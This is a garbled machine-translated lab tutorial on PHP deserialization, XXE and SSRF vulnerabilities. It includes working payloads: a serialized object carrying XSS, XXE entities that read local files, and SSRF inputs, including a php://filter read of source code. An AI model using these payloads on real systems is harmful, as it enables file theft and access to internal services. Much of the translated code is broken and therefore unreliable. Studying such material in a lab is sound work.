PHP deserialized
before understanding this loophole, you need to find out the php serialize (), unserialize () these two functions.
1. serialization serialize ()
sequence of said popular point is the string may be transmitted into an object, such as the following is an object:
class S {
public Test $ = "Pikachu";
}
$ S = S new new (); // Create an object
serialize ($ s); // this object serialization
result of the sequence obtained it is like this: O: 1: "S" : 1: {s: 4: "test"; s :. 7: "Pikachu";}
O: Representative object
1: represents the object length of the name of a character
S: name of the object
1: representing an object which has a variable
s: data type
4: the length of the variable name
test: variable name
s: data type
length value of the variable:. 7
Pikachu: variable value
2. deserialization to unserialize ()
is to be reduced to a sequence of the target string, and then continue to use the following code.
$ u = unserialize ( "O: 1:" S ": 1: {s: 4:"
echo $ u-> test; // get the results for pikachu
serialization and de-serialization itself is no problem, but if the content is deserialized user can control, and improper use of a background in PHP magic function, it will lead to security problems
common in several magic function:
__construct () when an object is created is called
__destruct () when an object is destroyed is called
__toString () when an object is treated as a string using
__sleep () in the object before being serialized running
__wakeup will be called immediately after the sequence of
vulnerability Examples:
class S {
var Test $ = "Pikachu";
function __destruct () {
echo $ this-> Test;
}
}
$ = S $ _GET [ ' Test '];
@ $ = Unser to unserialize ($ A);
XSS vulnerabilities caused by deserializing interface
For example, we use this vulnerability to enter the following payload
payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
XXE (XML external entity specific attack)
summarize is "the attacker by injecting specified xml entity to the server content, allowing the server to perform in accordance with the specified configuration, cause problems."
That server receives and parses the xml from the user terminal data, but we do not have strict security control, resulting in xml external entity injection.
Enter payload
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name>
We can see the definition of the variable value is returned, which can be considered a normal submission.
Here we define an external entity by keyword system, so that he can support a number of
Read external data protocols, such as the Linux etc / passwd.
I use windows so only a simple reading of the document
payload:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C:/phpstudy1/PHPTutorial/WWW/cookie.txt">
]>
<x>&f;</x>
SSRF
SSRF (Server-Side Request Forgery: server-side request forgery)
reasons for its formation are mostly due to the server provides the ability to get data from other server applications, but do not strictly limit the target address filtering and
result in an attacker can pass arbitrary address to make their back-end server to initiate the request, and returns the data to the destination address of the requested
data stream: an attacker -----> server ----> destination address
different functions according to the background using the corresponding impact and use different methods have
improperly used the following PHP function can lead to SSRF:
file_get_contents ()
fsockopen ()
curl_exec ()
If you must go through a background server to the user to specify a remote ( "or embedded in the front of the request." ) address resource request, please check filter destination address.
1.SSRF curl
payload: the value of the url into our payload
http://192.168.174.130/cookie.txt
2.SSRF file_get_content
payload:php://filter/read=convert.base64-encode/resource=ssrf.php
Php can see the output file to the front end, the source file may be acquired by base64 decoding
